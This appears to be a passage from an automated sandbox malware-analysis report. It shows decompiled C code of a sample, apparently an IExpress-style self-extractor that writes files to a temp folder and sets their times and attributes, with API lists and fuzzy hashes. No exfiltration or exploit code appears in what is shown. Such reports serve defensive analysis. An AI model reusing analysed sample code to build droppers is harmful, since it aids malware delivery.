                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xe891d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E00E84E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E00E86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xe88584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xe891e4;
                                                                                                                                                                                                        						_t58 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xe891e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xe891e4;
                                                                                                                                                                                                        						_t30 = E00E84702( &_v268, 0xe891e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E00E8476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E00E84980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00E847E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe893f4 =  *0xe893f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xe891e4;
                                                                                                                                                                                                        						_t63 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xe891e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xe891e4;
                                                                                                                                                                                                        						_t30 = E00E84702( &_v268, 0xe891e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E00E84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00E84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E00E84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d94
                                                                                                                                                                                                        0x00e84d99
                                                                                                                                                                                                        0x00e84d9e
                                                                                                                                                                                                        0x00e84da1
                                                                                                                                                                                                        0x00e84daa
                                                                                                                                                                                                        0x00e84daa
                                                                                                                                                                                                        0x00e84da3
                                                                                                                                                                                                        0x00e84da3
                                                                                                                                                                                                        0x00e84da3
                                                                                                                                                                                                        0x00e84db5
                                                                                                                                                                                                        0x00e84dbb
                                                                                                                                                                                                        0x00e84dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84dc3
                                                                                                                                                                                                        0x00e84dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84dc5
                                                                                                                                                                                                        0x00e84dbd
                                                                                                                                                                                                        0x00e84d2a
                                                                                                                                                                                                        0x00e84d2a
                                                                                                                                                                                                        0x00e84d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d2d
                                                                                                                                                                                                        0x00e84cf8
                                                                                                                                                                                                        0x00e84cfd
                                                                                                                                                                                                        0x00e84d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00E84DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00E84DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-305352358
                                                                                                                                                                                                        • Opcode ID: b6a13d76fd710f552a92700cbdccd8d744cf8ddf19ca9310dc73f7916547004d
                                                                                                                                                                                                        • Instruction ID: e37dc935361c72719632515446fd1904ab36ac4776c71cf9c7f0de7a0fa526e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6a13d76fd710f552a92700cbdccd8d744cf8ddf19ca9310dc73f7916547004d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE4135B62045038BCB22BF38DD446F573A5EB45308F085A6AD88EB72C5DA32DE4AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xe88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xe88d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00E84C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E84C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E84C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 757da2749d9e5521bd3b5ec04192924a9d4fabf0c2b918b10ba4a8c605e40b17
                                                                                                                                                                                                        • Instruction ID: 5c2456a18d50008f28619daf086f869c97398618408e784d2cb6e529f45e2dc9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757da2749d9e5521bd3b5ec04192924a9d4fabf0c2b918b10ba4a8c605e40b17
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F096B250110D6FAB14EFB5CD48DBBB7ADEB04244744053BB81DF1090EA30D914D7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00E8487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E8490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00E84A23,?,00E84F67,*MEMCAB,00008000,00000180), ref: 00E848DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00E84F67,*MEMCAB,00008000,00000180), ref: 00E84902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: e89afa12260dab032934c7d6dd600ce209bf9f61a719dfb3315b3afdb91cd776
                                                                                                                                                                                                        • Instruction ID: 35989e918d0051ab1cc7966cd6476f340d87376d0a0e1aae55e73381aca94c99
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e89afa12260dab032934c7d6dd600ce209bf9f61a719dfb3315b3afdb91cd776
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D0128E3E126712AF22960294C88FB7555CCBD6634F1B1235FDAEB71D1D5644C0483E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E84AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xe8858c; // 0x270
                                                                                                                                                                                                        				_t9 = E00E83680(_t20);
                                                                                                                                                                                                        				if( *0xe891d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xe88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xe89400; // 0x11b8f8
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xe89400 = _t15;
                                                                                                                                                                                                        							if( *0xe88184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xe88584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe893f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E8369F
                                                                                                                                                                                                          • Part of subcall function 00E83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836B2
                                                                                                                                                                                                          • Part of subcall function 00E83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00E84B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: 782ea328bf396a54249601f8a156254720971453f5d5c1bd47eef12c6fc45b88
                                                                                                                                                                                                        • Instruction ID: e0bc3998a18370b560b3b7e8300a61050c9d4708af10c7cb5880518c3665956e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 782ea328bf396a54249601f8a156254720971453f5d5c1bd47eef12c6fc45b88
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B01CC71640202AFDB14AFAAEC45BA27758EB44729F098225F93DBB1E1CB30C815CB80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E8658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xe88b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xe88b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00E816B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00E88B3E,00E88B3F,00000001,00E88B3E,-00000003,?,00E860EC,00E81140,?), ref: 00E865BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: dc62bc3da85b0fc8e30e624b0325006d71f0ee0d532e78633c3a3277d845b695
                                                                                                                                                                                                        • Instruction ID: b7e58339c92858ada053d34f763cca05c1d80d4403845e33a3e45ebbdb4de6e5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc62bc3da85b0fc8e30e624b0325006d71f0ee0d532e78633c3a3277d845b695
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F04C321042509FD3322B1D9884BA6BFDEDB86350F28196EE8DEE3245DA658C4683A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E8621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E00E8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E8623F
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 362e7c564f70337166971d42632659c078195233edc7b51f5b79e199079f8181
                                                                                                                                                                                                        • Instruction ID: 6a59c59533643d79194664db75831b87e330dde849755de8fb46e12eb143317f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 362e7c564f70337166971d42632659c078195233edc7b51f5b79e199079f8181
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F054B17442086FE750FB759D06BBA76ECDB54700F4004AAA98DFA191ED7499448750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
